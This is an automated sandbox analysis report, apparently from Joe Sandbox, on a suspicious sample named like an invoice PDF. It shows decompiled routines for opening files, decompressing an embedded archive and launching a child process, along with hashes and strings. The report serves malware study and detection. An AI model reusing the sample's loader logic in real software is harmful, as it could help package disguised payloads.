                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 147 132bd1f-132bd4f call 132baf3 150 132bd51-132bd5c call 131c9bb 147->150 151 132bd6a-132bd76 call 131e783 147->151 156 132bd5e-132bd65 call 131c9ce 150->156 157 132bd78-132bd8d call 131c9bb call 131c9ce 151->157 158 132bd8f-132bdd8 call 132ba5e 151->158 167 132c041-132c047 156->167 157->156 165 132be45-132be4e GetFileType 158->165 166 132bdda-132bde3 158->166 171 132be50-132be81 GetLastError call 131c998 CloseHandle 165->171 172 132be97-132be9a 165->172 169 132bde5-132bde9 166->169 170 132be1a-132be40 GetLastError call 131c998 166->170 169->170 176 132bdeb-132be18 call 132ba5e 169->176 170->156 171->156 186 132be87-132be92 call 131c9ce 171->186 174 132bea3-132bea9 172->174 175 132be9c-132bea1 172->175 179 132bead-132befb call 131e6cc 174->179 180 132beab 174->180 175->179 176->165 176->170 189 132bf0b-132bf2f call 132b811 179->189 190 132befd-132bf09 call 132bc6f 179->190 180->179 186->156 197 132bf42-132bf85 189->197 198 132bf31 189->198 190->189 196 132bf33-132bf3d call 13218f4 190->196 196->167 199 132bfa6-132bfb4 197->199 200 132bf87-132bf8b 197->200 198->196 203 132bfba-132bfbe 199->203 204 132c03f 199->204 200->199 202 132bf8d-132bfa1 200->202 202->199 203->204 206 132bfc0-132bff3 CloseHandle call 132ba5e 203->206 204->167 209 132c027-132c03b 206->209 210 132bff5-132c021 GetLastError call 131c998 call 131e895 206->210 209->204 210->209
                            C-Code - Quality: 42%
                            			E0132BD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E0132BAF3(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E0131E783(_t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E0132BA5E(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0131E6CC(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x1346108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E0132B811(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x1346108 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E0132BA5E();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x1346108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E0131C998(GetLastError());
											 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0131E895( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E0132BC6F(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E013218F4(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E0131C998(_t271);
							 *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x1346108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E0131C9CE())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x1346108 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0131C998(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E0132BA5E();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0131C9BB()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E0131C9CE())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0131C9BB()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E0131C9CE()));
				}
			}























































                            0x0132bd1f
                            0x0132bd42
                            0x0132bd46
                            0x0132bd47
                            0x0132bd47
                            0x0132bd47
                            0x0132bd49
                            0x0132bd4f
                            0x0132bd6a
                            0x0132bd6f
                            0x0132bd72
                            0x0132bd74
                            0x0132bd76
                            0x0132bd95
                            0x0132bd9c
                            0x0132bda3
                            0x0132bda6
                            0x0132bdb2
                            0x0132bdb5
                            0x0132bdbd
                            0x0132bdbe
                            0x0132bdc1
                            0x0132bdc1
                            0x0132bdc3
                            0x0132bdc8
                            0x0132bdca
                            0x0132bdcd
                            0x0132bdd5
                            0x0132bdd8
                            0x0132be45
                            0x0132be46
                            0x0132be4c
                            0x0132be4e
                            0x0132be97
                            0x0132be9a
                            0x0132bea3
                            0x0132bea6
                            0x0132bea9
                            0x0132beab
                            0x0132beab
                            0x0132beab
                            0x0132be9c
                            0x0132be9f
                            0x0132be9f
                            0x0132beb0
                            0x0132beb3
                            0x0132bebf
                            0x0132bec4
                            0x0132bed0
                            0x0132beda
                            0x0132bede
                            0x0132bee8
                            0x0132beeb
                            0x0132bef6
                            0x0132befb
                            0x0132bf0b
                            0x0132bf0e
                            0x0132bf12
                            0x0132bf13
                            0x0132bf19
                            0x0132bf1e
                            0x0132bf21
                            0x0132bf23
                            0x0132bf25
                            0x0132bf2a
                            0x0132bf2d
                            0x0132bf2f
                            0x0132bf59
                            0x0132bf7d
                            0x0132bf81
                            0x0132bf85
                            0x0132bf87
                            0x0132bf8b
                            0x0132bf8d
                            0x0132bf97
                            0x0132bf9a
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bfa1
                            0x0132bf8b
                            0x0132bfa6
                            0x0132bfb2
                            0x0132bfb4
                            0x0132c03f
                            0x0132c03f
                            0x00000000
                            0x0132bfba
                            0x0132bfba
                            0x0132bfbe
                            0x00000000
                            0x00000000
                            0x0132bfc3
                            0x0132bfd5
                            0x0132bfdd
                            0x0132bfe0
                            0x0132bfe1
                            0x0132bfe4
                            0x0132bfeb
                            0x0132bff0
                            0x0132bff3
                            0x0132c027
                            0x0132c031
                            0x0132c031
                            0x0132c03b
                            0x00000000
                            0x0132c03b
                            0x0132bffc
                            0x0132c015
                            0x0132c01c
                            0x0132be3f
                            0x00000000
                            0x0132be3f
                            0x0132bfb4
                            0x0132bf31
                            0x00000000
                            0x0132befd
                            0x0132bf04
                            0x0132bf07
                            0x0132bf09
                            0x0132bf33
                            0x0132bf35
                            0x00000000
                            0x0132bf3b
                            0x00000000
                            0x0132bf09
                            0x0132befb
                            0x0132be56
                            0x0132be59
                            0x0132be74
                            0x0132be79
                            0x0132be7f
                            0x0132be81
                            0x0132be8c
                            0x0132be8c
                            0x00000000
                            0x0132be81
                            0x0132bdda
                            0x0132bde1
                            0x0132bde3
                            0x0132be1a
                            0x0132be1a
                            0x0132be24
                            0x0132be27
                            0x0132be2e
                            0x0132be2e
                            0x0132be2e
                            0x0132be3a
                            0x00000000
                            0x0132be3a
                            0x0132bde5
                            0x0132bde9
                            0x00000000
                            0x00000000
                            0x0132bdeb
                            0x0132bdfa
                            0x0132bdff
                            0x0132be02
                            0x0132be03
                            0x0132be06
                            0x0132be06
                            0x0132be0d
                            0x0132be0f
                            0x0132be12
                            0x0132be15
                            0x0132be18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132bd78
                            0x0132bd7d
                            0x0132bd80
                            0x0132bd87
                            0x00000000
                            0x0132bd87
                            0x0132bd51
                            0x0132bd56
                            0x0132bd5c
                            0x0132bd5e
                            0x00000000
                            0x0132bd63

                            APIs
                              • Part of subcall function 0132BA5E: CreateFileW.KERNELBASE(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            • GetLastError.KERNEL32 ref: 0132BE33
                            • __dosmaperr.LIBCMT ref: 0132BE3A
                            • GetFileType.KERNELBASE(00000000), ref: 0132BE46
                            • GetLastError.KERNEL32 ref: 0132BE50
                            • __dosmaperr.LIBCMT ref: 0132BE59
                            • CloseHandle.KERNEL32(00000000), ref: 0132BE79
                            • CloseHandle.KERNEL32(?), ref: 0132BFC3
                            • GetLastError.KERNEL32 ref: 0132BFF5
                            • __dosmaperr.LIBCMT ref: 0132BFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction ID: 1677a5719b423ada13280ea3b751034c7d546d6b5266aea8b311a38d52ffd5a3
                            • Opcode Fuzzy Hash: dc651ec72f7eaf4dbbe537990d22d853d8ef71cc8d3e3ce636bb71717a8d65cb
                            • Instruction Fuzzy Hash: F0A15632A041299FDF2DEF7CD881BADBBA5AB06328F140159E815DF396DB359802CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311220, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 56%
                            			E01311220(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				intOrPtr _t15;
				intOrPtr _t32;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t49;
				void* _t51;
				void* _t52;

				_t38 = __edx;
				_t37 = __ecx;
				_t39 =  *((intOrPtr*)(_t49 + 8));
				if( *_t39 != 0) {
					L3:
					_t44 =  *((intOrPtr*)(_t49 + 0x14));
					_push(0);
					L01317864();
					_t12 = E01319F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
					_push( *((intOrPtr*)(_t44 + 8)));
					L01317864();
					_push(_t12); // executed
					_t13 = E01319808(_t37); // executed
					_t32 = _t13;
					_t51 = _t49 + 0x10;
					__eflags = _t32;
					if(__eflags != 0) {
						_push( *_t39);
						L01317864();
						_t14 = E01319B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
						_t52 = _t51 + 0x10;
						__eflags = _t14 - 1;
						if(__eflags >= 0) {
							__eflags =  *((char*)(_t44 + 0x10)) - 1;
							if(__eflags != 0) {
								L10:
								_t15 =  *_t39;
								__eflags = _t15;
								if(__eflags != 0) {
									_push(_t15); // executed
									E01319889(_t37, _t38, __eflags); // executed
									 *_t39 = 0;
								}
								return _t32;
							} else {
								_push(_t44);
								_t41 = E01311030(_t14, _t32, _t37, __eflags, _t32); // executed
								L01319803(_t32); // executed
								_t52 = _t52 + 0xc;
								_t32 = _t41;
								__eflags = _t41;
								if(__eflags != 0) {
									goto L10;
								} else {
									E01311980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
									__eflags = 0;
									return 0;
								}
							}
						} else {
							_push("Could not read from file\n");
							E01311980(__eflags);
							L01319803(_t32);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("Could not allocate read buffer\n");
						E01311980(__eflags);
						__eflags = 0;
						return 0;
					}
				} else {
					_t10 = E013128C0(_t39 + 0x68, "rb");
					_t49 = _t49 + 8;
					 *_t39 = _t10;
					_t59 = _t10;
					if(_t10 != 0) {
						goto L3;
					} else {
						_push("Cannot open archive file\n");
						E01311980(_t59);
						return 0;
					}
				}
			}



















                            0x01311220
                            0x01311220
                            0x01311221
                            0x01311228
                            0x01311252
                            0x01311254
                            0x01311258
                            0x0131125d
                            0x01311268
                            0x01311270
                            0x01311273
                            0x01311278
                            0x01311279
                            0x0131127e
                            0x01311280
                            0x01311283
                            0x01311285
                            0x0131129a
                            0x013112a1
                            0x013112a8
                            0x013112ad
                            0x013112b0
                            0x013112b3
                            0x013112ce
                            0x013112d2
                            0x01311305
                            0x01311305
                            0x01311307
                            0x01311309
                            0x0131130b
                            0x0131130c
                            0x01311314
                            0x01311314
                            0x0131131f
                            0x013112d4
                            0x013112d5
                            0x013112dd
                            0x013112df
                            0x013112e4
                            0x013112e7
                            0x013112e9
                            0x013112ec
                            0x00000000
                            0x013112ee
                            0x013112f7
                            0x013112ff
                            0x01311304
                            0x01311304
                            0x013112ec
                            0x013112b5
                            0x013112b5
                            0x013112ba
                            0x013112c0
                            0x013112c8
                            0x013112cd
                            0x013112cd
                            0x01311287
                            0x01311287
                            0x0131128c
                            0x01311294
                            0x01311299
                            0x01311299
                            0x0131122a
                            0x01311233
                            0x01311238
                            0x0131123b
                            0x0131123d
                            0x0131123f
                            0x00000000
                            0x01311241
                            0x01311241
                            0x01311246
                            0x01311251
                            0x01311251
                            0x0131123f

                            APIs
                            Strings
                            • Could not read from file, xrefs: 013112B5
                            • Cannot open archive file, xrefs: 01311241
                            • Could not allocate read buffer, xrefs: 01311287
                            • Error decompressing %s, xrefs: 013112F2
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            • API String ID: 3757756281-3387914768
                            • Opcode ID: e3d829030e36bba0416516398587ddba22cbb1e22685ef1d5b08d39de415ebef
                            • Instruction ID: f77e0b07d89179bdd72eeec44cccbfde91d9a02c9d2a01d116a45d443ecc958d
                            • Opcode Fuzzy Hash: e3d829030e36bba0416516398587ddba22cbb1e22685ef1d5b08d39de415ebef
                            • Instruction Fuzzy Hash: 9521D8F2A003067AEB187A7DBC41BDEBB89AF6115DF540531FE04D120EF762D56083A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314400, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100processsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 62%
                            			E01314400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
				struct _SECURITY_ATTRIBUTES* _v0;
				signed int _t26;
				intOrPtr _t45;
				int _t51;
				signed int _t53;
				signed int _t64;
				DWORD* _t66;
				void* _t70;

				_t70 = __eflags;
				_t62 = __edx;
				E01317880();
				_t26 =  *0x133c008; // 0xa3433343
				_a8292 = _t26 ^ _t64;
				_v0 = 0;
				E01314BF0( &_a100, _a8300, 0x1000);
				_push(1);
				_push(0x16);
				E0131EDBE(__edx, _t70);
				_push(1);
				_push(2); // executed
				E0131EDBE(__edx, _t70); // executed
				_push(1);
				_push(0xf);
				E0131EDBE(__edx, _t70);
				_push(1);
				_push(0x15);
				E0131EDBE(_t62, _t70);
				_a4.nLength = 0xc;
				_a8 = 0;
				_a12 = 1;
				GetStartupInfoW( &_a32);
				_a36 = 0;
				_a40 = 0;
				_a44 = 0;
				_a76 = 0x101;
				_a80 = 1;
				_a88 = E0131E926(E013209C5(E0131A7EB(0)));
				_a92 = E0131E926(E013209C5(E0131A7EB(1)));
				_t45 = E0131E926(E013209C5(E0131A7EB(2)));
				_t66 = _t64 + 0x50;
				_a96 = _t45;
				_t51 = CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16); // executed
				if(_t51 == 0) {
					_push("Error creating child process!\n");
					_push("CreateProcessW");
					_t53 = E01311860(_t62, __eflags) | 0xffffffff;
					__eflags = _t53;
					E0131786A();
					return _t53;
				} else {
					WaitForSingleObject(_a16.hProcess, 0xffffffff);
					GetExitCodeProcess(_a16, _t66);
					E0131786A();
					return _v0;
				}
			}











                            0x01314400
                            0x01314400
                            0x01314405
                            0x0131440a
                            0x01314411
                            0x01314429
                            0x01314432
                            0x01314437
                            0x01314439
                            0x0131443b
                            0x01314440
                            0x01314442
                            0x01314444
                            0x01314449
                            0x0131444b
                            0x0131444d
                            0x01314452
                            0x01314454
                            0x01314456
                            0x0131445e
                            0x0131446a
                            0x01314472
                            0x0131447b
                            0x01314486
                            0x01314490
                            0x01314498
                            0x013144a0
                            0x013144a8
                            0x013144c0
                            0x013144d7
                            0x013144e7
                            0x013144ec
                            0x013144ef
                            0x0131451b
                            0x01314523
                            0x01314557
                            0x0131455c
                            0x01314572
                            0x01314572
                            0x01314575
                            0x01314580
                            0x01314525
                            0x0131452b
                            0x01314539
                            0x0131454b
                            0x01314556
                            0x01314556

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 0131EDBE: SetConsoleCtrlHandler.KERNELBASE(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                              • Part of subcall function 0131EDBE: GetLastError.KERNEL32 ref: 0131EEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 0131447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 0131450C
                            • CreateProcessW.KERNELBASE ref: 0131451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131452B
                            • GetExitCodeProcess.KERNEL32 ref: 01314539
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: ad975629ca2f809ac6875a8a5ed864af36c304958dde003ece2e8ccd45cc4232
                            • Instruction ID: 704bdd1a0a04bcccce030a883fd89d491b60972c8002e2a6817eb0aaaaccf1b2
                            • Opcode Fuzzy Hash: ad975629ca2f809ac6875a8a5ed864af36c304958dde003ece2e8ccd45cc4232
                            • Instruction Fuzzy Hash: C9319670504345ABE724AB78CC4EF8FB6E8AF54708F004919F985A72C4DBB9D144CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311030, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 76COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E01311030(void* __eax, void* __ebx, void* __ecx, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr _t37;

				_t36 = _a8;
				_push( *((intOrPtr*)(_t36 + 0xc)));
				L01317864();
				_t19 = E01319808(__ecx); // executed
				_t37 = _t19;
				_t47 = _t37;
				if(_t37 != 0) {
					_t20 = _v0;
					_push( *((intOrPtr*)(_t36 + 8)));
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v60 = _t20;
					L01317864();
					_push( *((intOrPtr*)(_t36 + 0xc)));
					_v60 = _t20;
					_v52 = _t37;
					L01317864();
					_v52 = _t20;
					__eflags = E01316720( &_v68, "1.2.11", 0x38);
					if(__eflags < 0) {
						_push(_v44);
						E01311980(__eflags, "Error %d from inflateInit: %s\n", _t22);
						__eflags = 0;
						return 0;
					} else {
						_push(4);
						_push( &_v68);
						__eflags = E01314E60();
						if(__eflags < 0) {
							_push(_v44);
							E01311980(__eflags, "Error %d from inflate: %s\n", _t26);
							__eflags = 0;
							return 0;
						} else {
							E013165F0(__ebx,  &_v68);
							return _t37;
						}
					}
				} else {
					_push("Error allocating decompression buffer\n");
					E01311980(_t47);
					return 0;
				}
			}















                            0x01311035
                            0x01311039
                            0x0131103c
                            0x01311042
                            0x01311047
                            0x0131104c
                            0x0131104e
                            0x01311065
                            0x01311069
                            0x0131106c
                            0x01311074
                            0x0131107c
                            0x01311084
                            0x01311088
                            0x0131108d
                            0x01311090
                            0x01311094
                            0x01311098
                            0x0131109f
                            0x013110b5
                            0x013110b7
                            0x013110fb
                            0x01311105
                            0x0131110d
                            0x01311114
                            0x013110b9
                            0x013110bd
                            0x013110bf
                            0x013110c8
                            0x013110ca
                            0x013110e1
                            0x013110eb
                            0x013110f3
                            0x013110fa
                            0x013110cc
                            0x013110d1
                            0x013110e0
                            0x013110e0
                            0x013110ca
                            0x01311050
                            0x01311050
                            0x01311055
                            0x01311064
                            0x01311064

                            APIs
                            Strings
                            • Error %d from inflateInit: %s, xrefs: 01311100
                            • Error allocating decompression buffer, xrefs: 01311050
                            • 1.2.11, xrefs: 013110A7
                            • Error %d from inflate: %s, xrefs: 013110E6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            • Opcode ID: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction ID: 71e37c7775126a26b8dd9b2ce0d29a2fa0c4e1388e7e2a95d02720c2a2802712
                            • Opcode Fuzzy Hash: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction Fuzzy Hash: 5A2184B6A043056BD704AA799C02A8FBF95AF9425CF444439FE48D2215F375D218C7D3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314920, Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 70%
                            			E01314920() {
				void* _v4;
				void* _v8;
				long _v12;
				long _v16;
				void* _t18;
				int _t22;
				int _t25;
				void* _t28;
				void* _t30;
				long* _t32;

				_t32 =  &_v12;
				_v8 = 0xffffffff;
				_t30 = 0;
